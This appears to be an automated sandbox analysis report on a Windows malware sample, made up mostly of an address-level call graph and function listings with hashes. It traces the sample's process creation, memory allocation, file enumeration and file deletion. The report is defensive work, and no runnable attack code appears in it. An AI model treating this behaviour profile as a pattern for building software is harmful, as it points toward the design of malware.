97231->97235 97232 3b1306 97233 3ba030 RtlFreeHeap 97232->97233 97234 3b1316 97233->97234 97235->97232 97236 3b1344 97235->97236 97238 3b1349 97235->97238 97237 3ba030 RtlFreeHeap 97236->97237 97237->97238 97239 3bb170 97240 3ba030 RtlFreeHeap 97239->97240 97241 3bb185 97240->97241 97247 3b7770 97248 3b778a 97247->97248 97251 2d42df0 LdrInitializeThunk 97248->97251 97249 3b77b2 97251->97249 97252 3a58f4 97255 3a315c 97252->97255 97253 3a5902 97256 3a78a0 2 API calls 97255->97256 97257 3a316c 97256->97257 97258 3b8160 NtClose 97257->97258 97259 3a3181 97257->97259 97258->97259 97259->97253 97260 3a27ae 97261 3a27e8 97260->97261 97264 3a6050 97261->97264 97263 3a27f3 97265 3a6083 97264->97265 97266 3a60a7 97265->97266 97271 3b7ce0 97265->97271 97266->97263 97268 3b8160 NtClose 97270 3a614a 97268->97270 97269 3a60ca 97269->97266 97269->97268 97270->97263 97272 3b7cfd 97271->97272 97275 2d42ca0 LdrInitializeThunk 97272->97275 97273 3b7d29 97273->97269 97275->97273 97276 39b4e0 97277 3b9fa0 NtAllocateVirtualMemory 97276->97277 97278 39cb51 97277->97278 97279 3a70a0 97280 3a7112 97279->97280 97281 3a70b8 97279->97281 97281->97280 97283 3aacc0 97281->97283 97284 3aace6 97283->97284 97285 3aaf05 97284->97285 97310 3b8550 97284->97310 97285->97280 97287 3aad5c 97287->97285 97288 3bb240 2 API calls 97287->97288 97289 3aad78 97288->97289 97289->97285 97290 3aae49 97289->97290 97291 3b77c0 LdrInitializeThunk 97289->97291 97292 3a5760 LdrInitializeThunk 97290->97292 97294 3aae68 97290->97294 97293 3aadd4 97291->97293 97292->97294 97293->97290 97298 3aaddd 97293->97298 97296 3aaeed 97294->97296 97316 3b7390 97294->97316 97295 3aae31 97297 3a7c20 LdrInitializeThunk 97295->97297 97304 3a7c20 LdrInitializeThunk 97296->97304 97303 3aae3f 97297->97303 97298->97285 97298->97295 97299 3aae0f 97298->97299 97313 3a5760 97298->97313 97331 3b3960 LdrInitializeThunk 97299->97331 97303->97280 97306 3aaefb 97304->97306 97305 3aaec4 97321 3b7430 97305->97321 97306->97280 97308 3aaede 97326 3b7570 97308->97326 97311 3b856d 97310->97311 97312 3b857e CreateProcessInternalW 97311->97312 97312->97287 97332 3b7980 97313->97332 97315 3a579e 97315->97299 97317 3b7405 97316->97317 97319 3b73b7 97316->97319 97338 2d439b0 LdrInitializeThunk 97317->97338 97318 3b742a 97318->97305 97319->97305 97322 3b74a2 97321->97322 97324 3b7454 97321->97324 97339 2d44340 LdrInitializeThunk 97322->97339 97323 3b74c7 97323->97308 97324->97308 97327 3b75e5 97326->97327 97328 3b7597 97326->97328 97340 2d42fb0 LdrInitializeThunk 97327->97340 97328->97296 97329 3b760a 97329->97296 97331->97295 97333 3b7a25 97332->97333 97335 3b79a7 97332->97335 97337 2d42d10 LdrInitializeThunk 97333->97337 97334 3b7a6a 97334->97315 97335->97315 97337->97334 97338->97318 97339->97323 97340->97329 97341 3b0aa1 97342 3b0aad 97341->97342 97354 3b7fd0 97342->97354 97344 3b0ac2 97345 3b0ae0 97344->97345 97346 3b0af5 97344->97346 97348 3b8160 NtClose 97345->97348 97347 3b8160 NtClose 97346->97347 97351 3b0afe 97347->97351 97349 3b0ae9 97348->97349 97350 3b0b2a 97351->97350 97352 3ba030 RtlFreeHeap 97351->97352 97353 3b0b1e 97352->97353 97355 3b806c 97354->97355 97357 3b7ff4 97354->97357 97356 3b8082 NtReadFile 97355->97356 97356->97344 97357->97344 97358 3af920 97359 3af93d 97358->97359 97360 3a4530 2 API calls 97359->97360 97361 3af95b 97360->97361 97362 3abf60 97364 3abf89 97362->97364 97363 3ac08d 97364->97363 97365 3ac033 FindFirstFileW 97364->97365 97365->97363 97367 3ac04e 97365->97367 97366 3ac074 FindNextFileW 97366->97367 97368 3ac086 FindClose 97366->97368 97367->97366 97368->97363 97369 3a57e0 97370 3a7c20 LdrInitializeThunk 97369->97370 97371 3a5810 97370->97371 97373 3a583c 97371->97373 97374 3a7ba0 97371->97374 97375 3a7be4 97374->97375 97376 3a7c05 97375->97376 97381 3b74d0 97375->97381 97376->97371 97378 3a7bf5 97379 3a7c11 97378->97379 97380 3b8160 NtClose 97378->97380 97379->97371 97380->97376 97382 3b7545 97381->97382 97384 3b74f7 97381->97384 97386 2d44650 LdrInitializeThunk 97382->97386 97383 3b756a 97383->97378 97384->97378 97386->97383 97387 3b5120 97388 3b517a 97387->97388 97390 3b5187 97388->97390 97391 3b2ca0 97388->97391 97392 3b9fa0 NtAllocateVirtualMemory 97391->97392 97393 3b2ce1 97392->97393 97394 3a4530 2 API calls 97393->97394 97397 3b2de6 97393->97397 97396 3b2d27 97394->97396 97395 3b2d60 Sleep 97395->97396 97396->97395 97396->97397 97397->97390 97398 3b0f20 97399 3b0f3c 97398->97399 97400 3b0f78 97399->97400 97401 3b0f64 97399->97401 97403 3b8160 NtClose 97400->97403 97402 3b8160 NtClose 97401->97402 97404 3b0f6d 97402->97404 97405 3b0f81 97403->97405 97408 3ba150 RtlAllocateHeap 97405->97408 97407 3b0f8c 97408->97407 97409 399667 97410 39966b 97409->97410 97411 39963a 97409->97411 97412 399660 97411->97412 97413 39964d CreateThread 97411->97413 97414 3a96db 97416 3a96ea 97414->97416 97415 3a96f1 97416->97415 97417 3ba030 RtlFreeHeap 97416->97417 97417->97415 97419 3a6ed0 97420 3a6eec 97419->97420 97424 3a6f3f 97419->97424 97422 3b8160 NtClose 97420->97422 97420->97424 97421 3a7068 97423 3a6f07 97422->97423 97429 3a62e0 NtClose LdrInitializeThunk LdrInitializeThunk 97423->97429 97424->97421 97430 3a62e0 NtClose LdrInitializeThunk LdrInitializeThunk 97424->97430 97426 3a7042 97426->97421 97431 3a64b0 NtClose LdrInitializeThunk LdrInitializeThunk 97426->97431 97429->97424 97430->97426 97431->97421 97432 3b7610 97433 3b7694 97432->97433 97435 3b7634 97432->97435 97437 2d42ee0 LdrInitializeThunk 97433->97437 97434 3b76c5 97437->97434 97440 3a0b42 97441 3a0b5a 97440->97441 97442 3a4530 2 API calls 97441->97442 97443 3a0b78 97442->97443 97444 3a0bbd 97443->97444 97445 3a0bac PostThreadMessageW 97443->97445 97445->97444 97446 3af040 97447 3af0a4 97446->97447 97448 3a6050 2 API calls 97447->97448 97450 3af1cd 97448->97450 97449 3af1d4 97450->97449 97475 3a6160 97450->97475 97452 3af373 97453 3af250 97453->97452 97454 3af382 97453->97454 97479 3aee20 97453->97479 97456 3b8160 NtClose 97454->97456 97458 3af38c 97456->97458 97457 3af285 97457->97454 97459 3af290 97457->97459 97460 3ba110 RtlAllocateHeap 97459->97460 97461 3af2b9 97460->97461 97462 3af2d8 97461->97462 97463 3af2c2 97461->97463 97488 3aed10 CoInitialize 97462->97488 97464 3b8160 NtClose 97463->97464 97466 3af2cc 97464->97466 97467 3af2e6 97490 3b7c30 97467->97490 97469 3af362 97470 3b8160 NtClose 97469->97470 97471 3af36c 97470->97471 97472 3ba030 RtlFreeHeap 97471->97472 97472->97452 97473 3af304 97473->97469 97474 3b7c30 LdrInitializeThunk 97473->97474 97474->97473 97476 3a6185 97475->97476 97494 3b7ac0 97476->97494 97480 3aee3c 97479->97480 97481 3a4530 2 API calls 97480->97481 97483 3aee5a 97481->97483 97482 3aee63 97482->97457 97483->97482 97484 3a4530 2 API calls 97483->97484 97485 3aef2e 97484->97485 97486 3a4530 2 API calls 97485->97486 97487 3aef88 97485->97487 97486->97487 97487->97457 97489 3aed75 97488->97489 97489->97467 97491 3b7c4d 97490->97491 97499 2d42ba0 LdrInitializeThunk 97491->97499 97492 3b7c7d 97492->97473 97495 3b7ada 97494->97495 97498 2d42c60 LdrInitializeThunk 97495->97498 97496 3a61f9 97496->97453 97498->97496 97499->97492 97500 3a6b00 97501 3a6b2a 97500->97501 97504 3a7a50 97501->97504 97503 3a6b54 97505 3a7a6d 97504->97505 97511 3b78b0 97505->97511 97507 3a7abd 97508 3a7ac4 97507->97508 97509 3b7980 LdrInitializeThunk 97507->97509 97508->97503 97510 3a7aed 97509->97510 97510->97503 97512 3b7940 97511->97512 97513 3b78d4 97511->97513 97516 2d42f30 LdrInitializeThunk 97512->97516 97513->97507 97514 3b7979 97514->97507 97516->97514 97517 3aa7c0 97522 3aa4f0 97517->97522 97519 3aa7cd 97536 3aa190 97519->97536 97521 3aa7e9 97523 3aa515 97522->97523 97547 3a7e70 97523->97547 97526 3aa652 97526->97519 97528 3aa669 97528->97519 97529 3aa660 97529->97528 97531 3aa751 97529->97531 97562 3a9bf0 97529->97562 97532 3aa7a9 97531->97532 97571 3a9f50 97531->97571 97534 3ba030 RtlFreeHeap 97532->97534 97535 3aa7b0 97534->97535 97535->97519 97537 3aa1a6 97536->97537 97540 3aa1b1 97536->97540 97538 3ba110 RtlAllocateHeap 97537->97538 97538->97540 97539 3aa1c7 97539->97521 97540->97539 97541 3a7e70 GetFileAttributesW 97540->97541 97542 3aa4be 97540->97542 97545 3a9bf0 RtlFreeHeap 97540->97545 97546 3a9f50 RtlFreeHeap 97540->97546 97541->97540 97543 3aa4d7 97542->97543 97544 3ba030 RtlFreeHeap 97542->97544 97543->97521 97544->97543 97545->97540 97546->97540 97548 3a7e91 97547->97548 97549 3a7e98 GetFileAttributesW 97548->97549 97550 3a7ea3 97548->97550 97549->97550 97550->97526 97551 3b2580 97550->97551 97552 3b258e 97551->97552 97553 3b2595 97551->97553 97552->97529 97554 3a4530 2 API calls 97553->97554 97555 3b25ca 97554->97555 97556 3b25d9 97555->97556 97575 3b2050 LdrLoadDll LdrLoadDll 97555->97575 97558 3ba110 RtlAllocateHeap 97556->97558 97561 3b2771 97556->97561 97560 3b25f2 97558->97560 97559 3ba030 RtlFreeHeap 97559->97561 97560->97559 97560->97561 97561->97529 97563 3a9c16 97562->97563 97576 3ad430 97563->97576 97565 3a9c7d 97567 3a9e00 97565->97567 97569 3a9c9b 97565->97569 97566 3a9de5 97566->97529 97567->97566 97568 3a9ab0 RtlFreeHeap 97567->97568 97568->97567 97569->97566 97581 3a9ab0 97569->97581 97572 3a9f76 97571->97572 97573 3ad430 RtlFreeHeap 97572->97573 97574 3a9ff2 97573->97574 97574->97531 97575->97556 97578 3ad446 97576->97578 97577 3ad453 97577->97565 97578->97577 97579 3ba030 RtlFreeHeap 97578->97579 97580 3ad48c 97579->97580 97580->97565 97582 3a9ac6 97581->97582 97585 3ad4a0 97582->97585 97584 3a9bcc 97584->97569 97586 3ad4c4 97585->97586 97587 3ba030 RtlFreeHeap 97586->97587 97588 3ad55c 97586->97588 97587->97588 97588->97584 97589 3b80c0 97590 3b80e4 97589->97590 97591 3b812c 97589->97591 97592 3b8142 NtDeleteFile 97591->97592

                                                        Executed Functions

                                                        Function 00399670 Relevance: 46.8, Strings: 37, Instructions: 539COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 28 399670-399a95 29 399aa6-399ab2 28->29 30 399ac8-399b0b 29->30 31 399ab4-399ac6 29->31 32 399b1c-399b25 30->32 31->29 34 399b35-399b39 32->34 35 399b27-399b33 32->35 36 399b3b-399b42 34->36 37 399b45-399b4c 34->37 35->32 36->37 39 399b4e-399b71 37->39 40 399b73 37->40 39->37 41 399b7a-399b81 40->41 42 399ba8-399bb2 41->42 43 399b83-399ba6 41->43 44 399bd3-399bdd 42->44 45 399bb4-399bd1 42->45 43->41 46 399bee-399bf5 44->46 45->42 47 399c20-399c30 46->47 48 399bf7-399c1e 46->48 50 399c33-399c3d 47->50 48->46 51 399c3f-399c5a 50->51 52 399c76 50->52 54 399c5c-399c60 51->54 55 399c61-399c63 51->55 53 399c7d-399c84 52->53 56 399cab-399cb5 53->56 57 399c86-399ca9 53->57 54->55 58 399c65-399c6e 55->58 59 399c74 55->59 60 399cc6-399cd2 56->60 57->53 58->59 59->50 61 399cea-399cf4 60->61 62 399cd4-399cdd 60->62 65 399d05-399d11 61->65 63 399ce8 62->63 64 399cdf-399ce2 62->64 63->60 64->63 67 399d13-399d22 65->67 68 399d24-399d2d 65->68 67->65 70 399d33-399d3a 68->70 71 399ea2-399eab 68->71 74 399d3c-399d6f 70->74 75 399d71-399d74 70->75 72 399ead-399ece 71->72 73 399ed0-399ed7 71->73 72->71 77 399edd call 3b9cc0 73->77 78 39a090-39a09a 73->78 74->70 76 399d7a-399d81 75->76 80 399da8-399db8 76->80 81 399d83-399da6 76->81 86 399ee2-399eec 77->86 79 39a0ab-39a0b7 78->79 83 39a0b9-39a0cb 79->83 84 39a0cd-39a0d7 79->84 80->80 85 399dba-399dc1 80->85 81->76 83->79 87 39a0e8-39a0f4 84->87 88 399de8-399df7 85->88 89 399dc3-399de6 85->89 91 399efd-399f09 86->91 92 39a10b-39a115 87->92 93 39a0f6-39a109 87->93 94 399df9-399dfd 88->94 95 399e2d-399e37 88->95 89->85 96 399f2b-399f37 91->96 97 399f0b-399f1b 91->97 98 39a126-39a132 92->98 93->87 100 399e2b 94->100 101 399dff-399e29 94->101 102 399e48-399e54 95->102 105 399f39-399f5a 96->105 106 399f5c-399f6c 96->106 103 399f29 97->103 104 399f1d-399f26 97->104 108 39a143-39a14c 98->108 109 39a134-39a141 98->109 100->71 101->94 110 399e6b-399e71 102->110 111 399e56-399e69 102->111 103->91 104->103 105->96 106->106 107 399f6e-399f75 106->107 113 399fa2-399fac 107->113 114 399f77-399fa0 107->114 115 39a14e-39a160 108->115 116 39a162-39a169 108->116 109->98 118 399e75-399e7c 110->118 111->102 122 399fbd-399fc9 113->122 114->107 115->108 123 39a16b-39a18e 116->123 124 39a190-39a19a 116->124 120 399e9d 118->120 121 399e7e-399e9b 118->121 120->68 121->118 125 399fcb-399fdd 122->125 126 399fdf-399fe9 122->126 123->116 125->122 127 399ffa-39a003 126->127 129 39a019-39a020 127->129 130 39a005-39a017 127->130 131 39a052-39a05c 129->131 132 39a022-39a050 129->132 130->127 134 39a06d-39a079 131->134 132->129 134->78 135 39a07b-39a08e 134->135 135->134
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$9$$"$$$($-:$1P$1\$2$2u$3W$9$9$$9,$=J$>$B"$E$F$G+$HD$Z$\:$\^$_$cg$e[W;$f$h\$m=$p1$uS$w$x*$y$yz$}m
                                                        • API String ID: 0-366951236
                                                        • Opcode ID: fcb4f3d28b924e1c4e9f439457e990674b2ff287ef2744238c54314375137829
                                                        • Instruction ID: e8711dae2fb5d0d704dd0f30baceea0c389a83c0cc9706b19c19445b82483a1b
                                                        • Opcode Fuzzy Hash: fcb4f3d28b924e1c4e9f439457e990674b2ff287ef2744238c54314375137829
                                                        • Instruction Fuzzy Hash: BD52AEB0D06628CBEF25CF48C9987DDBBB1BB44309F1081DAD409AB291C7B96E85DF45
                                                        Function 003ABF60 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 003AC044
                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 003AC07F
                                                        • FindClose.KERNELBASE(?), ref: 003AC08A
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 3541575487-0
                                                        • Opcode ID: 24464816e17da397133f8faeb9bff9d2a6b8fc60da996649612782ece46a2aa2
                                                        • Instruction ID: 60cf5e7949b21618c29b89dfccfac34389832e632ba5c4a98c4edd225be4c757
                                                        • Opcode Fuzzy Hash: 24464816e17da397133f8faeb9bff9d2a6b8fc60da996649612782ece46a2aa2
                                                        • Instruction Fuzzy Hash: DD31A771900349BBEB21DF60CC85FFF77BCEF55744F144559BA08AB181DA70AA848BA0
                                                        Function 003B7E70 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 003B7F66
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 8d28ed5a82766e8a88ecc84e479eca568abbf297ed05f10f815e9ef91fae3f37
                                                        • Instruction ID: 857f13d7260df54cf6475a347fc544618187295c57bc70698c0e34646d1724fb
                                                        • Opcode Fuzzy Hash: 8d28ed5a82766e8a88ecc84e479eca568abbf297ed05f10f815e9ef91fae3f37
                                                        • Instruction Fuzzy Hash: B531C6B5A01609AFCB14DF99D881EEFB7F9EF8C314F108219F919A7240D770A811CBA5
                                                        Function 003B7FD0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 003B80AB
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 42abda00a236972264b0f29d2bfd90fb591ae2773a949e304055543eef79dc66
                                                        • Instruction ID: 426c4585c738693a42638570abfffde7abe5c5ff26cb903adad863c075b278b0
                                                        • Opcode Fuzzy Hash: 42abda00a236972264b0f29d2bfd90fb591ae2773a949e304055543eef79dc66
                                                        • Instruction Fuzzy Hash: C0310BB5A00609AFDB14DF99D881EEFB7B9EF8C314F104219FE19A7241D770A811CBA1
                                                        Function 003B82B0 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(003A1AAE,?,?,00000000,00000004,00003000,?,?,?,?,?,?,003A1AAE,003B9FD1,?,00004448), ref: 003B836D
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 1849f4d48a2eb12130bf378be031498f75d2e4a919294946eae0b6b7fcea62f7
                                                        • Instruction ID: 25eb300e1ba16953dc580ed83c794ded3e2ce338e01560cf91f05e1357823921
                                                        • Opcode Fuzzy Hash: 1849f4d48a2eb12130bf378be031498f75d2e4a919294946eae0b6b7fcea62f7
                                                        • Instruction Fuzzy Hash: FB212BB5A00649ABDB10DF99CC41FEF77A9EF88314F004209FE099B241D770A911CBA1
                                                        Function 003B80C0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 0bceb573df5401a9c667bfc0a2f8a9442a426de7377309d08418d9d12b721291
                                                        • Instruction ID: dd750835cd131b3d70523ab3b8b8be8f2eaf844a920fc6bc7f23f5f6609abeef
                                                        • Opcode Fuzzy Hash: 0bceb573df5401a9c667bfc0a2f8a9442a426de7377309d08418d9d12b721291
                                                        • Instruction Fuzzy Hash: 5A01C471A416097BD611EBA8CC42FEB736CEF85714F004219FB59AF181DBB17904C7A5
                                                        Function 003B8160 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 003B8197
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 107a58e02835addb894d731512d60433070ccd53c3aca26d0bedc16aa1168d12
                                                        • Instruction ID: 2b66418764eb2a6371b8ed5eda663bb221320f7de9dc6497cb41ff32802c4441
                                                        • Opcode Fuzzy Hash: 107a58e02835addb894d731512d60433070ccd53c3aca26d0bedc16aa1168d12
                                                        • Instruction Fuzzy Hash: 04E04F312002057FD510EA5EDC41FDB776CDBC6710F014415FA08AB142CA70794186E1
                                                        Function 02D44340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 07997d2643e717431eec8c76e3c3a9e7640496aa4c78b6ca675e0f415c0e4530
                                                        • Instruction ID: 079cb37b3a56eda390ab8a7259cac5ab094a9c43d2d405f0053ead97f0da891d
                                                        • Opcode Fuzzy Hash: 07997d2643e717431eec8c76e3c3a9e7640496aa4c78b6ca675e0f415c0e4530
                                                        • Instruction Fuzzy Hash: 1290023160981012964071584884547400597E0301B55C011F4428674C8A548E966761
                                                        Function 02D44650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: cafa43d2f52950c27755f6a4d4b830b88cbce59f1088a192353cb6ecb9b7ddc3
                                                        • Instruction ID: 7275cad34dbdf6ed9039e85d212da973a2721179c23879528fcfacda4164552f
                                                        • Opcode Fuzzy Hash: cafa43d2f52950c27755f6a4d4b830b88cbce59f1088a192353cb6ecb9b7ddc3
                                                        • Instruction Fuzzy Hash: 0890026160551042464071584804407600597E1301395C115B4558670C86588D95A669
                                                        Function 02D42AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b09870c018556dbeaab9b5f19c98240fec5dcb14f4a874ce1550a22fd1c37e36
                                                        • Instruction ID: a6f4fb239ff7628fee744fe3e929e2d65489eefbb3a3bb3648d06853797bf721
                                                        • Opcode Fuzzy Hash: b09870c018556dbeaab9b5f19c98240fec5dcb14f4a874ce1550a22fd1c37e36
                                                        • Instruction Fuzzy Hash: 80900435315410030705F55C07045070047C7D5351355C031F501D770CD771CDF17531
                                                        Function 02D42AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 0817a6151a1c70c656b71911cfdfd60dfcd58ac9ff08bca888f210ec4e844ad4
                                                        • Instruction ID: 73a539ba60c49456c14b76eb568e697a5b794c95457bfd4fa78bd7a7473cfdbe
                                                        • Opcode Fuzzy Hash: 0817a6151a1c70c656b71911cfdfd60dfcd58ac9ff08bca888f210ec4e844ad4
                                                        • Instruction Fuzzy Hash: 52900225225410020645B558060450B044597D6351395C015F541A6B0CC6618DA56721
                                                        Function 02D42BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9bd9bca4b54c6c4c934f0250fd2f6ee035b00078a6b848cf7c4f44c64a7e4710
                                                        • Instruction ID: 1e8a292fdf40ebbcfff905dd645bef06b6ff0ba8c9dcd419ba68d7d1e7de25aa
                                                        • Opcode Fuzzy Hash: 9bd9bca4b54c6c4c934f0250fd2f6ee035b00078a6b848cf7c4f44c64a7e4710
                                                        • Instruction Fuzzy Hash: 0D90023120541802D6807158440464B000587D1301F95C015B4029774DCA558F997BA1
                                                        Function 02D42BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8a9790a692d668e8fbd47d551280a8c45269587ac277621488b191e7eda18896
                                                        • Instruction ID: 1dc5cc322c22f5a8e20ed3c3c17c2c3d9e52c107bb2ad2bcf9a42a165ae1ab77
                                                        • Opcode Fuzzy Hash: 8a9790a692d668e8fbd47d551280a8c45269587ac277621488b191e7eda18896
                                                        • Instruction Fuzzy Hash: 5590023120945842D64071584404A47001587D0305F55C011B40687B4D96658E95BA61
